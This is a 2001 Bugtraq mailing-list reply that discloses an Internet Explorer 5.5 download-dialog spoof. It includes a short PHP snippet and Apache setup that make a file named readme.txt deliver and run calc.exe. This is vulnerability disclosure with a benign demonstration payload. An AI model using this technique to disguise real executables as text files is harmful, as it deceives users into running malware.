RE: File extensions spoofable in MSIE download dialog

From: StatiC (static@tampabay.rr.com)
Date: 11/29/01 

Date: Wed, 28 Nov 2001 21:51:32 -0500
From: StatiC <static@tampabay.rr.com>
To: bugtraq@securityfocus.com
Subject: RE: File extensions spoofable in MSIE download dialog
Message-ID: <20011128215132.A1379@milla.xStatiCa.com>

I was playing with apache configs a few months ago and noticed a similar issue with IE5.5. The procodure below will cause IE5.5 to display the open dialog for readme.txt but once opened, it executes immediately on IE5.5 sp2 with no hint that it is really getting an executable file called calc.exe. I only tested it with IE5.5.

With an apache/php server add .txt to the already existing .php extension in the apache.conf file, so that apache will recognise .txt extensions as php script files.

1. Copy the real windows calc.exe from a windows system to the html root dir.

2. Copy the readme.txt file below to the same html root dir.

3. go to the url http://yourserver/readme.txt

You will see the same behavior mentioned in the previous alert.

FILE <readme.txt> BEGIN ----
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
FILE <readme.txt> END ----

Why does microsoft think it is wise to trust the filename in the url over what the header content-type is set to for display purposes since the content-type seems to take priority for what will really happen with the file.

StatiC